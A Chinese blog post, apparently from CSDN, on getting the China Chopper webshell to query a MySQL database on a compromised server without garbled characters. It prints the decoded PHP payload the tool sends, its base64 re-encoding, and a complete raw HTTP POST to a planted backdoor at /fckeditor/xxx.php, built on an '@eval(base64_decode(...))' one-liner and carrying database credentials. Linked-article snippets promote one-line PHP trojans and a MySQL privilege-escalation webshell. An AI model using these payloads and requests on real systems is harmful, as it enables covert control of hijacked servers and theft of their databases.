菜刀怎么接mysql_chopper菜刀一句话操作mysql数据库乱码问题 -电脑资料

最新推荐文章于 2023-07-23 06:37:32 发布
最新推荐文章于 2023-07-23 06:37:32 发布
阅读量245 收藏
点赞数
文章标签: 菜刀怎么接mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_30605469/article/details/113935564
版权

发现gbk等非gb2312的,用菜刀的一句话客户端工具连接后必然乱码,调整工具的编码方式没用,

1.抓包base64解密:post变量中z0就是如下语句(没有红色的语句):

@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$m=get_magic_quotes_gpc();$hst=$m?stripslashes($_POST["z1"]):$_POST["z1"];$usr=$m?stripslashes($_POST["z2"]):$_POST["z2"];$pwd=$m?stripslashes($_POST["z3"]):$_POST["z3"];$dbn=$m?stripslashes($_POST["z4"]):$_POST["z4"];$sql=base64_decode($_POST["z5"]);$T=@mysql_connect($hst,$usr,$pwd);@mysql_select_db($dbn);@mysql_query("set names 'gbk'");$q=@mysql_query($sql);$i=0;while($col=@mysql_field_name($q,$i)){echo($col."\t|\t");$i%2b%2b;}echo("\r\n");while($rs=@mysql_fetch_row($q)){for($c=0;$c

2.重新加密后(注意+号已经被%2b, /被 %2f 代替了:

QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X

21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2bfCIpOzskbT1nZXRfbWFnaWNfcXVvdGVzX2dwYygpOyRoc3Q9JG0%2fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejEiXSk6JF9QT1NUWyJ6MSJdOyR1c3I9JG0%2fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejIiXSk6JF9QT1NUWyJ6MiJdOyRwd2Q9JG0%2fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejMiXSk6JF9QT1NUWyJ6MyJdOyRkYm49JG0%2fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejQiXSk6JF9QT1NUWyJ6NCJdOyRzcWw9YmF

zZTY0X2RlY29kZSgkX1BPU1RbIno1Il0pOyRUPUBteXNxbF9jb25uZWN0KCRoc3QsJHVz

ciwkcHdkKTtAbXlzcWxfc2VsZWN0X2RiKCRkYm4pO0BteXNxbF9xdWVyeSgic2V0IG5hbW

VzICdnYmsnIik7JHE9QG15c3FsX3F1ZXJ5KCRzcWwpOyRpPTA7d2hpbGUoJGNvbD1AbX

lzcWxfZmllbGRfbmFtZSgkcSwkaSkpe2VjaG8oJGNvbC4iXHR8XHQiKTskaSsrO31lY2hvKCJcc

lxuIik7d2hpbGUoJHJzPUBteXNxbF9mZXRjaF9yb3coJHEpKXtmb3IoJGM9MDskYzwkaTskY

ysrKXtlY2hvKHRyaW0oJHJzWyRjXSkpO2VjaG8oIlx0fFx0Iik7fWVjaG8oIlxyXG4iKTt9QG15

c3FsX2Nsb3NlKCRUKTs7ZWNobygifDwtIik7ZGllKCk7

3.没法用菜刀了,那就用自定义的post提交工具吧,如nc最原始了:

POST /fckeditor/xxx.php HTTP/1.1

Referer: http://xxx.com

Content-Type: application/x-www-form-urlencoded

User-Agent: User-Agent: Mozilla/4.0 (Windows NT 5.1) Firefox/3.0.0.1

Host: xxxxx.com

Content-Length: 1227

Cache-Control: no-cache

Cookie: __utma=70948559.2011506103.1300526684.1301244532.1301247546.6; __utmz=70948559.1300526684.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=155ec963c319dccb74e9751fa4c73300

0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2bfCIpOzskbT1nZXRfbWFnaWNfcXVvdGVzX2dwYygpOyRoc3Q9JG0%2fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejEiXSk6JF9QT1NUWyJ6MSJdOyR1c3I9JG0%2fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejIiXSk6JF9QT1NUWyJ6MiJdOyRwd2Q9JG0%2fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejMiXSk6JF9QT1NUWyJ6MyJdOyRkYm49JG0%2fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejQiXSk6JF9QT1NUWyJ6NCJdOyRzcWw9YmFzZTY0X2RlY29

kZSgkX1BPU1RbIno1Il0pOyRUPUBteXNxbF9jb25uZWN0KCRoc3QsJHVzciwkcHdkKTtAbXlzcWxfc2

VsZWN0X2RiKCRkYm4pO0BteXNxbF9xdWVyeSgic2V0IG5hbWVzICdnYmsnIik7JHE9QG15c3FsX3F1

ZXJ5KCRzcWwpOyRpPTA7d2hpbGUoJGNvbD1AbXlzcWxfZmllbGRfbmFtZSgkcSwkaSkpe2VjaG8

oJGNvbC4iXHR8XHQiKTskaSsrO31lY2hvKCJcclxuIik7d2hpbGUoJHJzPUBteXNxbF9mZXRjaF9yb

3coJHEpKXtmb3IoJGM9MDskYzwkaTskYysrKXtlY2hvKHRyaW0oJHJzWyRjXSkpO2VjaG8oIlx0fFx

0Iik7fWVjaG8oIlxyXG4iKTt9QG15c3FsX2Nsb3NlKCRUKTs7ZWNobygifDwtIik7ZGllKCk7&z1=

localhost&z2=localnewsssB&z3=local_ddd&z4=db_9518&z5=xxxxx">fuck9518=@eval(base64_decode($_POST[chr(122).chr(48)]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtA

c2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2bfCIpOzskbT1nZXRfbWFnaWNfcXVvdGVzX2dwYygpOyRoc3Q9JG0%2fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejEiXSk6JF9QT1NUWyJ6MSJdOyR1c3I9JG0%2fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejIiXSk6JF9QT1NUWyJ6MiJdOyRwd2Q9JG0%2fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejMiXSk6JF9QT1NUWyJ6MyJdOyRkYm49JG0%2fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejQiXSk6JF9QT1NUWyJ6NCJdOyRzcWw9YmFzZTY0X2RlY

29kZSgkX1BPU1RbIno1Il0pOyRUPUBteXNxbF9jb25uZWN0KCRoc3QsJHVzciwkcHdkKTtAbXlzcWxfc2VsZW

N0X2RiKCRkYm4pO0BteXNxbF9xdWVyeSgic2V0IG5hbWVzICdnYmsnIik7JHE9QG15c3FsX3F1ZXJ5KCRzc

WwpOyRpPTA7d2hpbGUoJGNvbD1AbXlzcWxfZmllbGRfbmFtZSgkcSwkaSkpe2VjaG8oJGNvbC4iXHR8XH

QiKTskaSsrO31lY2hvKCJcclxuIik7d2hpbGUoJHJzPUBteXNxbF9mZXRjaF9yb3coJHEpKXtmb3IoJGM9MDsk

YzwkaTskYysrKXtlY2hvKHRyaW0oJHJzWyRjXSkpO2VjaG8oIlx0fFx0Iik7fWVjaG8oIlxyXG4iKTt9QG15c3Fs

X2Nsb3NlKCRUKTs7ZWNobygifDwtIik7ZGllKCk7&z1=localhost&z2=localnewsssB&z3=local_ddd&z4=

db_9518&z5=xxxxx

其中指定z5为sql语句的base64编码即可,chopper菜刀一句话操作mysql数据库乱码问题》(https://www.unjs.com)。

冯委
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
一句话php木马制作教程_菜刀无法正常访问一句话问题
weixin_35092037的博客
12-21 1799
今天自己搭建了一个php版的xss cookie收平台。为了图操作上的方便,给自己的web放了一句话木马。但是当我打开菜刀时,报了500错误,如图想到可能是php版本问题导致这个问题的。查看了一下服务器上的php版本,7.0.33抓包查看菜刀数据: 去掉z0数据访问正常 那么问题点在z0数据了,解密z0数据: 看到解密后的z0数据,一下想到了...
菜刀虚拟终端原理
qq_40334963的博客
04-08 1493
菜刀虚拟终端系统命令执行原理分析。 菜刀传输恶意代码的方式:通过调用array_map函数,对敏感字符串做字符串拼和大小写混合,对核心代码做base64加密。 代码执行步骤: 1.关闭脚本信息报错 2.获取当前文件绝对路径 3.字符串拼系统命令 4.调用proc_open函数执行拼的系统命令 5.输出结果 6.结束脚本
技术剖析中国菜刀原理
TsengYUen920的博客
12-24 2288
一、自写脚本 @ini_set(“display_errors”,“0”);@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;print(“hello PHP!”);;echo("|<-");die(); 先用@ini_set(“display_errors”,“0”);临时关闭PHP的错误显示功能 @...
ctf之AWD(3)_重写菜刀
余韵
09-16 784
ctf之AWD(3)_重写菜刀 原理 多次post cmd=@eval(base64_decode($_POST[z0])); #cmd为原密码,z0为新密码 wireshark抓包分析 菜刀2011 post数据分析 &cmd=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3B &z0=QGluaV9zZXQoImRpc...
BugKuCTF 分析.1
vegetable_haker的博客
09-29 430
flag被盗 打开题目,发现文件是一个数据包,下载数据包 将下载下来的数据包用wareshark打开,往下滑,发现有一个post请求直在这条数据包上右键追踪TCP流 发现flag 中国菜刀 下载压缩包,解压 打开数据包,发现第五条数据包有个post请求,在上面追踪TCP流,发现一船base64编码 复制,用在线编码解码,得到一段代码如下,它的作用是读取c:/wwwroot目录下所有文件、目录...
BUCK.zip_buck_buck matlab_buck-boost_buck算法_chopper
07-14
标题中的"BUCK.zip_buck_buck matlab_buck-boost_buck算法_chopper"表明这是一个关于Buck转换器的仿真项目,使用MATLAB语言进行编程,并涉及到Buck-Boost变换器以及斩波技术。Buck转换器是一种常用的直流-直流(DC-...
field.rar_FOC induction motor_Field-Oriented_chopper_foc
07-15
simulation of Field-oriented control (FOC) of induction motor using chopper
S229_BuckBoost_01.rar_DC-DC变换_chopper dspace_dc dc converter_变换
07-15
电力电子DC-DC变换:BuckBoost斩波器MATLAB仿真
rezarezaii.zip_chopper_dc motor_dc motor chopper_zip
07-14
标题中的"rezarezaii.zip_chopper_dc motor_dc motor chopper_zip"暗示了这是一个关于直流电机斩波控制的压缩文件,其中可能包含了相关的模型或资料。"chopper"通常指的是斩波器,一种用于调节直流电机电压的电子...
zhanboqi.rar_chopper_chopper circuit_斩波 仿真_斩波器_斩波电路
09-21
在电子工程领域,斩波器(Chopper)是一种重要的电力电子装置,它通过开关元件的周期性通断来改变直流电的平均电压,从而实现直流电到直流电的变换。本篇文章将深入探讨“斩波器”这一主题,尤其是刘占波电路的设计...
MySQL提权专用网马
05-10
先前我发布了一个用于MYSQL提权的UDF,不过好像不少朋友不是很明白它的使用,不断有人问我它的使用方法,有人干脆叫我写个此UDF的专用PHP。说实话在我写这个PHP之前就只学过点ASP,对PHP那是一窍不通,所以程序中不妥之处在所难免,高手不要见笑。PHP写的比较笨,这里就不讲它怎么写的了,直讲它的使用。 一、功能: 利用MYSQL的自定义函数功能(再次声明:利用MYSQL UDF提权绝非是溢出,而是MYSQL本身的一个功能),将MYSQL账号转化为系统system权限。 二、适用场合: 1.目标系统是Windows(Win2000,XP,Win2003);2.你已经拥有MYSQL的某个用户账号,此账号必须有对mysql的insert和delete权限以创建和抛弃函数(MYSQL文档原语)。 三、使用帮助: 第一步:将PHP文件上传到目标机上,填入你的MYSQL账号经行连 第二步:连成功后,导出DLL文件,导出时请勿必注意导出路径(一般情况下对任何目录可写,无需考虑权限问题),对于MYSQL5.0以上版本,你必须将DLL导出到目标机器的系统目录(win 或 system32),否则在下一步操作中你会看到"No paths allowed for shared library"错误。 三、使用帮助: 第一步:将PHP文件上传到目标机上,填入你的MYSQL账号经行连
WEBSHELL管理工具流量特征——基础篇
ALLEN'Blog
01-17 1723
今天给大家带来了WEBSHELL管理工具流量特征基础篇,简单介绍了菜刀和蚁剑这两个比较简单的流量特征,之后也会给大家带来别的WEBSHELL管理工具流量分析,如果夏欢本文希望可以一键三连支持一下。
兵临城下丨Webshell管理工具流量检测研究
C20220511的博客
05-16 712
引言 俗话说得好,80后用菜刀,90后用蚁剑,95后用冰蝎和哥斯拉。本文主要是对这四个主流的并具有跨时代意义的webshell管理工具进行流量分析和检测。 注:本文均以phpshell连为例进行研究分析,毕竟“php是世界上最好的语言” ① 中国菜刀chopper) 中国菜刀是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚本的网站,都可以用中国菜刀来进行管理。主流有2011版本,2014版本和2016版本。 2011和2014版本: 特征..
菜刀webshell特征分析
博客地址 www.sec0nd.top
08-01 1509
Webshell是hacker经常使用的一种恶意脚本,其目的是获得对服务器的执行操作权限,比如执行系统命令、窃取用户数据、删除web页面、修改主页等,其危害不言而喻。hacker通常利用常见的漏洞,如SQL注入、远程文件包含(RFI)、FTP,甚至使用跨站点脚本攻击(XSS)等方式作为社会工程攻击的一部分,最终达到控制网站服务器的目的。有个想法,看看他这个工具的原理,再分析一下菜刀的特征。我用的最多的就是菜刀,蚁剑安装不上,后面有机会再分析。......
Cknife流量分析
weixin_30808693的博客
10-01 1033
本文首发:https://<img src=1 onerror=\u006coc\u0061tion='j\x61v\x61script:\x61lert\x281\x29'>testdemo 0x01 环境 <?php eval($_REQUEST['shell'] ?> 0x02 命令执行 执行命令结果如下图所示 POST的数据如下图所示 对P...
中国菜刀使用与原理分析
热门推荐
weixin_45597678的博客
12-04 1万+
中国菜刀的功能 中国菜刀的使用 原理分析
上传漏洞(一句话木马、中国菜刀使用、DVWA文件上传漏洞利用)
tmzy1的博客
03-24 3625
上传漏洞(一句话木马、中国菜刀使用、DVWA文件上传漏洞利用)
常见的webshell管理工具及流量特征
最新发布
2301_78834737的博客
07-23 267
作为老牌 Webshell 管理神器,中国菜刀的攻击流量特征明显,容易被各类安全设备检测,实际场景中越来越少使用,加密 Webshell 正变得日趋流行。最开始使用明文传输,后来采用base64加密。
电容式微加速度计模拟前端口电路设计与优化
同时,为了降低运算放大器的直流偏差和1/f(闪烁)噪声,文中引入了斩波稳定技术(Chopper Stabilization, CHS)。斩波稳定技术通过高频斩波信号来消除低频噪声,从而提高电路的线性度和稳定性。 除此之外,电路...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值